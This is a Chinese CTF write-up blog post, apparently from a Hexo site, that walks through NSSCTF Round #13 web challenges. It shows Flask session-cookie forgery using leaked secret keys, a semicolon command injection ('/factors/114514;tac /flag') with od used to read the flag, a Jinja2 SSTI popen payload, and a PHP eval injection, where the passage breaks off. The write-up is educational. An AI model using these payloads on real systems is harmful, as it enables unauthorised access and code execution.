<!DOCTYPE html>
<html lang="zh-CN">
    <!-- title -->
<!-- keywords -->
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="seora">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="seora">
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    <meta name="description" content="">
    <meta name="description" content="[NSSCTF Round #13]部分题目复现拖了n久的产物，还有一道TimeTrcer暂时没写没后续补上。 [NSSRound#13 Basic]flask?jwt?每个功能点进去看下，发现重置密码这里有hint, 1th3f1askisfunny   Flask 通常指的是 Python 的一个轻量级 Web 框架，用来快速构建网站或接口。 在安全或 CTF 环境中，说“Flask题”“fl">
<meta property="og:type" content="article">
<meta property="og:title" content="[NSSCTF Round #13]部分题目复现">
<meta property="og:url" content="https://everythingis-ok.github.io/2025/11/04/NSSCTF-Round-13-%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="seora&#39;s blog^^">
<meta property="og:description" content="[NSSCTF Round #13]部分题目复现拖了n久的产物，还有一道TimeTrcer暂时没写没后续补上。 [NSSRound#13 Basic]flask?jwt?每个功能点进去看下，发现重置密码这里有hint, 1th3f1askisfunny   Flask 通常指的是 Python 的一个轻量级 Web 框架，用来快速构建网站或接口。 在安全或 CTF 环境中，说“Flask题”“fl">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-00-59.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-05-46.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-05-55.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-32-49.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-43-09.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-53-44.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-01-19.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-07-33.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-08-01.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-43-06.png">
<meta property="og:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-11-04_22-05-58.png">
<meta property="article:published_time" content="2025-11-04T14:08:49.000Z">
<meta property="article:modified_time" content="2025-11-05T05:23:30.758Z">
<meta property="article:author" content="seora">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-00-59.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/favicon.ico">
    <title>[NSSCTF Round #13]部分题目复现 · seora&#39;s Studio</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .footer-fixed-btn,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(
            -45deg,
            #444 0,
            #444 80px,
            #333 80px,
            #333 160px
        );
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link id="stylesheet-fancybox" rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.36/dist/fancybox/fancybox.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link id="stylesheet-base" rel="preload" href="/css/style.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link id="stylesheet-mobile" rel="preload" href="/css/mobile.css" as="style" onload="this.onload=null;this.rel='stylesheet';this.media='screen and (max-width: 960px)'">
    <link id="stylesheet-theme-dark" rel="preload" href="/css/dark.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    <!-- 百度统计  -->
    <!-- 谷歌统计  -->
    <!-- Google tag (gtag.js) -->
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="seora's blog^^" type="application/atom+xml">
</head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
        <body class="post-body">
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        <div class="header-sidebar-menu">
            <div style="padding-left: 1px;">&#xe775;</div>
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href="/">seora's Studio.</a>
        </span>
    </div>
    <!-- toggle banner -->
    <div class="banner">
        <div class="blog-title header-element">
            <a href="/">seora&#39;s Studio.</a>
        </div>
        <div class="post-title header-element">
            <a href="#" class="post-name">[NSSCTF Round #13]部分题目复现</a>
        </div>
    </div>
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- donate button -->
    <div class="donate-popup donate-popup--hidden">
    <div class="donate-popup__title">Buy Me A Coffee</div>
    <div class="donate-popup__content">
        <div class="donate-popup__content-description">If this post helped you, please consider buying the author a cup of sugar-free coffee ☕️.</div>
        <img
            class="donate-popup__content-qrCode"
            title="Wechat"
            alt="Wechat"
            src="/source/images/donate-wechat.png"
        ></img>
        <img
            class="donate-popup__content-qrCode"
            title="Alipay"
            alt="Alipay"
            src="/source/images/donate-alipay.png"
        ></img>
    </div>
</div>

    <div
        title="Donate to the author"
        class="footer-fixed-btn footer-fixed-btn--hidden donate-btn"
    >
        <i class="fas fa-donate"></i>
    </div>

    <!-- back to top button -->
    <div class="footer-fixed-btn footer-fixed-btn--hidden back-top">
        <div>&#xe639;</div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="    height:50vh;
">
    <!-- 主页  -->
    <!-- 404页  -->
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
                [NSSCTF Round #13]部分题目复现
            <!-- 404 -->
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            <!-- 404 -->
        </p>
        <!-- 文章页 meta -->
            <div class="post-intros">
                <!-- 文章页标签  -->
                    <div class="post-intro-tags" >
</div>

                <!-- 文章字数统计 -->
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.6k</span>阅读时长: <span class="post-count reading-time">7 min</span></span>
                    </div>
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2025/11/04</span>
                    <!-- busuanzi -->
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" alt="loading">
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <h1 id="NSSCTF-Round-13-部分题目复现"><a href="#NSSCTF-Round-13-部分题目复现" class="headerlink" title="[NSSCTF Round #13]部分题目复现"></a>[NSSCTF Round #13]部分题目复现</h1><p>拖了n久的产物，还有一道TimeTrcer暂时没写没后续补上。</p>
<h2 id="NSSRound-13-Basic-flask-jwt"><a href="#NSSRound-13-Basic-flask-jwt" class="headerlink" title="[NSSRound#13 Basic]flask?jwt?"></a>[NSSRound#13 Basic]flask?jwt?</h2><p>每个功能点进去看下，发现重置密码这里有hint,</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">th3f1askisfunny</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-00-59.png" alt="PixPin_2025-10-24_20-00-59"></p>
<p><strong>Flask</strong> 通常指的是 Python 的一个轻量级 Web 框架，用来快速构建网站或接口。<br> 在安全或 CTF 环境中，说“Flask题”“flask相关漏洞”一般是指：</p>
<ol>
<li><strong>Jinja2 模板注入（SSTI）</strong></li>
</ol>
<p>Flask 默认使用 Jinja2 作为模板引擎，如果开发者写了诸如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">render_template_string(&quot;Hello &quot; + request.args.get(&#x27;name&#x27;))</span><br></pre></td></tr></table></figure>

<p>就会导致用户可控输入被直接当成模板渲染，从而造成 <strong>Server-Side Template Injection（SSTI）</strong>。<br> 攻击者可以利用它执行任意 Python 代码（比如 <code>&#123;&#123; config.__class__.__init__.__globals__['os'].popen('ls').read() &#125;&#125;</code>）。</p>
<ol start="2">
<li><strong>Flask Debug Pin 反序列化 &#x2F; 控制台利用</strong></li>
</ol>
<p>如果应用启用了调试模式 <code>app.run(debug=True)</code>，那么攻击者可以尝试通过 Debug PIN 获取交互式控制台，直接执行代码。</p>
<ol start="3">
<li><strong>Session 伪造</strong></li>
</ol>
<p>Flask 默认使用签名 cookie 存储 session 数据，如果开发者使用默认 <code>app.secret_key</code> 或者泄露了它，就可以伪造任意 session 内容。</p>
<ol start="4">
<li><strong>Pickle 反序列化</strong></li>
</ol>
<p>某些 Flask 题会在 session 或上传点中利用 pickle.loads() 反序列化对象，形成命令执行漏洞。</p>
<p>注册完账号登陆一下，有个getflag的按钮</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-05-46.png" alt="PixPin_2025-10-24_20-05-46"></p>
<p>点击提示用户权限不足，基本确定是session伪造，</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-05-55.png" alt="PixPin_2025-10-24_20-05-55"></p>
<p>现在的session:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.eJwlzjsOwjAMANC7ZGbwL47Ty1RuYgvWlE6Iu1OJ-S3vU_ZccT7L9l5XPMr-mmUrtZHYESZiCgygnpUnGhp4dWqu0Y21i-CARik3po5IhkxMdtBDSbizTkqMqm14ho-W1VVrAjSdA6lDgoohe0poYMfozFzuyHXG-m-ofH8xey3s.aPtrag.EI5J72Qg_ucyF6Rrh3IoeE4Z3R8</span><br></pre></td></tr></table></figure>

<p>先解码jwt:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python flask_session_cookie_manager3.py decode -c &#x27;.eJwlzjsOwjAMANC7ZGbwL47Ty1RuYgvWlE6Iu1OJ-S3vU_ZccT7L9l5XPMr-mmUrtZHYESZiCgygnpUnGhp4dWqu0Y21i-CARik3po5IhkxMdtBDSbizTkqMqm14ho-W1VVrAjSdA6lDgoohe0poYMfozFzuyHXG-m-ofH8xey3s.aPtrag.EI5J72Qg_ucyF6Rrh3IoeE4Z3R8&#x27; -s &#x27;th3f1askisfunny&#x27;</span><br></pre></td></tr></table></figure>

<p>解码后：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#x27;_fresh&#x27;: True, &#x27;_id&#x27;: &#x27;57248be8448603006af53d18180a5a27a6e98369441c072f43d1f6cef30ff1f3a06b6243936d2f1e567cafeac7f5a665f0076dc1290f064813af4e6e191e9333&#x27;, &#x27;_user_id&#x27;: &#x27;2&#x27;&#125;</span><br></pre></td></tr></table></figure>

<p>修改一下<code>_user_id</code>属性，猜测<code>admin</code>的<code>_user_id</code>是<code>1</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python flask_session_cookie_manager3.py encode -s &quot;th3f1askisfunny&quot; -t &quot;&#123;&#x27;_fresh&#x27;: True, &#x27;_id&#x27;: &#x27;06f231c9009af8bd640aa6c80172276e1653f82e55f8820c4fd4c78e8cc286fb5cde1a80b04b0da6ba3b51ada4097611c50f1c05cfd67346f7e3331a98b1481c&#x27;, &#x27;_user_id&#x27;: &#x27;1&#x27;&#125;&quot;</span><br></pre></td></tr></table></figure>

<p>得到伪造好的session:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.eJwlzsENwzAIAMBd_O4DbINxlokAg9Jv0ryq7t5KvQnuXfY84zrK9jrveJT9ucpWgLM29AkwNcUWd1BlF8BR6-BAppZSgyhFKnjP1X1IiHsVTiNfgSpg0A2WsmkzQl3aYQ5GdIJEB_JcPFrnHNFaQ51i2AW9_CL3Fed_g-XzBZsFLu0.aPtuug.f8xySJOdowkfZnQI-FV81UNG24s</span><br></pre></td></tr></table></figure>

<p>修改session拿到flag:</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-32-49.png" alt="PixPin_2025-10-24_20-32-49"></p>
<h2 id="NSSRound-13-Basic-ez-factors"><a href="#NSSRound-13-Basic-ez-factors" class="headerlink" title="[NSSRound#13 Basic]ez_factors"></a>[NSSRound#13 Basic]ez_factors</h2><p>题目描述</p>
<p>原生 Linux 因数爆破工具。flag在根目录</p>
<p>容易看出，2 31 1847是114514的因数，</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-43-09.png" alt="PixPin_2025-10-24_20-43-09"></p>
<p>网址后面&#x2F;factors&#x2F;114514使用分号<code>;</code>来执行多个命令,</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/factors/114514;tac /flag</span><br></pre></td></tr></table></figure>

<p>记得进行url编码。</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_20-53-44.png" alt="PixPin_2025-10-24_20-53-44"></p>
<p>发现得到的内容只有数字，看来应该是对回显进行了限制，只能回显数字，</p>
<p>这种情况下，我们可以使用<code>od</code>命令来读取文件</p>
<p><code>od -t d1 /flag </code>是一个命令行指令，用于以十进制形式显示 <code>/flag</code> 文件的内容。</p>
<p>具体来说<code>-t</code> 参数用于指定展示的数据格式，<code>d1</code> 表示每个数值使用一个字节来显示，即按字节读取。</p>
<p><code>/flag</code> 是文件的路径，这个指令会读取 <code>/flag</code> 文件的内容，并将其以十进制形式进行展示。</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-01-19.png" alt="PixPin_2025-10-24_21-01-19"></p>
<p>把这些十进制数字依次转成 ASCII 字符再拼起来，就是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NSSC&#123;70240b1e-0bb1-4cc7-84c2-73b51745e53b&#125;</span><br></pre></td></tr></table></figure>



<h2 id="NSSRound-13-Basic-flask-jwt-hard"><a href="#NSSRound-13-Basic-flask-jwt-hard" class="headerlink" title="[NSSRound#13 Basic]flask?jwt?(hard)"></a>[NSSRound#13 Basic]flask?jwt?(hard)</h2><p>在拿flag这个界面有一个路由，我们访问一下，</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-07-33.png" alt="PixPin_2025-10-24_21-07-33"></p>
<p>给了上一次登录的时间。</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-08-01.png" alt="PixPin_2025-10-24_21-08-01"><br>我们用<code>Flask-Unsign</code>对cookie进行解密，<br>发现刚好cookie里有对应正确的时间，随意修改session查看报错，可以在这查到<code>secret_key</code>是<code>hardgam3_C0u1d_u_f1ndM3????</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#x27;_fresh&#x27;: True, &#x27;_id&#x27;: &#x27;57248be8448603006af53d18180a5a27a6e98369441c072f43d1f6cef30ff1f3a06b6243936d2f1e567cafeac7f5a665f0076dc1290f064813af4e6e191e9333&#x27;, &#x27;_user_id&#x27;: &#x27;2&#x27;, &#x27;time&#x27;: dateime.datetime(2025, 10, 24, 13, 7, 22, tzifo=datetime.timezone.utc)&#125;</span><br></pre></td></tr></table></figure>

<p>然后利用<code>flask_session_cookie_manager3</code>来<code>伪造session</code>，使<code>_user_id</code>的值变成<code>1</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">flask_session_cookie_manager3.py encode -s &quot;hardgam3_C0u1d_u_f1ndM3????&quot; -t &quot;&#123;&#x27;_fresh&#x27;: True, &#x27;_id&#x27;: &#x27;57248be8448603006af53d18180a5a27a6e98369441c072f43d1f6cef30ff1f3a06b6243936d2f1e567cafeac7f5a665f0076dc1290f064813af4e6e191e9333&#x27;, &#x27;_user_id&#x27;: &#x27;1&#x27;&#125;&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.eJwlzjEOwzAIAMC_MHcAgzHOZyJig9rVaaaqf2-kzrfcB_ZccT5he68rHrC_JmxQWxE7wkRMkRHVs_IkI0OvXpprdGPtIjSwlZQbU0ckYyYlO-qhRbizzpIUVdvwDB8tq6vWRGw6B5WOiSpG7CmhQZ2iMzPckeuM9d8QfH8xeC3r.aPuCRg.2AOscUKFQ3d_NHrcy1hJkUPx7jw</span><br></pre></td></tr></table></figure>

<p>得到flag:</p>
<p><img src="https://raw.githubusercontent.com/everythingis-ok/image/main/PixPin_2025-10-24_21-43-06.png" alt="PixPin_2025-10-24_21-43-06"></p>
<h2 id="NSSRound-13-Basic-MyWeb"><a href="#NSSRound-13-Basic-MyWeb" class="headerlink" title="[NSSRound#13 Basic]MyWeb"></a>[NSSRound#13 Basic]MyWeb</h2><p>源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(E_ALL);</span><br><span class="line"><span class="comment">// 写了个网页存储JSON数据，但是还不会处理json格式，这样处理应该没有什么问题吧</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_GET</span>[<span class="string">&#x27;mode&#x27;</span>] == <span class="string">&#x27;save&#x27;</span>) &#123;</span><br><span class="line">    <span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;/tmp/data.json&#x27;</span>);</span><br><span class="line">    <span class="variable">$value</span> = <span class="title function_ invoke__">addslashes</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;value&#x27;</span>]);</span><br><span class="line">    <span class="variable">$data</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;]&#x27;</span>, <span class="string">&quot;, &#x27;<span class="subst">$value</span>&#x27;]&quot;</span>, <span class="variable">$data</span>);</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;/tmp/data.json&#x27;</span>, <span class="variable">$data</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="variable">$_GET</span>[<span class="string">&#x27;mode&#x27;</span>] == <span class="string">&#x27;read&#x27;</span>) &#123;</span><br><span class="line">    <span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;/tmp/data.json&#x27;</span>);</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&#x27;$data = &#x27;</span> . <span class="variable">$data</span> . <span class="string">&#x27;;&#x27;</span>);</span><br><span class="line">    <span class="title function_ invoke__">print_r</span>(<span class="variable">$data</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); </span><br></pre></td></tr></table></figure>

<p>接受mode参数,参数值为save为保存模式:</p>
<ul>
<li>从 <code>/tmp/data.json</code> 文件读取原有内容（假设是一个数组格式，如 <code>[&#39;a&#39;, &#39;b&#39;]</code>）。</li>
<li>获取 URL 参数 <code>value</code>，例如 <code>?mode=save&amp;value=hello</code>。</li>
<li>用 <code>addslashes()</code> 处理（转义引号等），防止字符串破坏结构。</li>
<li>用 <code>str_replace()</code> 在 <code>]</code> 前插入新值，形成新的“数组”。</li>
<li>再次写回文件。</li>
</ul>
<p>例如，data,json的内容为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[1,&quot;Leaf&quot;,1234]</span><br></pre></td></tr></table></figure>

<p>然后将value值为6666，执行代码后，data.json中的内容就变为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[1,&quot;Leaf&quot;,1234,6666]</span><br></pre></td></tr></table></figure>

<p>自然想到可以利用sql注入的思路，在json中注释符为<code>//</code>，所以将value的值变为<code>]//</code>，那么后面的代码就会被注释掉。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[1,&quot;Leaf&quot;,1234]//,]</span><br></pre></td></tr></table></figure>

<p>再看后续read模式会把<code>/tmp/data.json</code>中内容读取然后带着php代码执行，所以我们可以利用这一点来进行RCE。</p>
<p>以下为read模式过程解释：</p>
<p>mode参数值为read为读取模式</p>
<ul>
<li>从文件读取内容（如 <code>[&#39;apple&#39;, &#39;banana&#39;]</code>）。</li>
<li>使用 <code>eval()</code> 把字符串当作 PHP 代码执行，相当于：</li>
</ul>
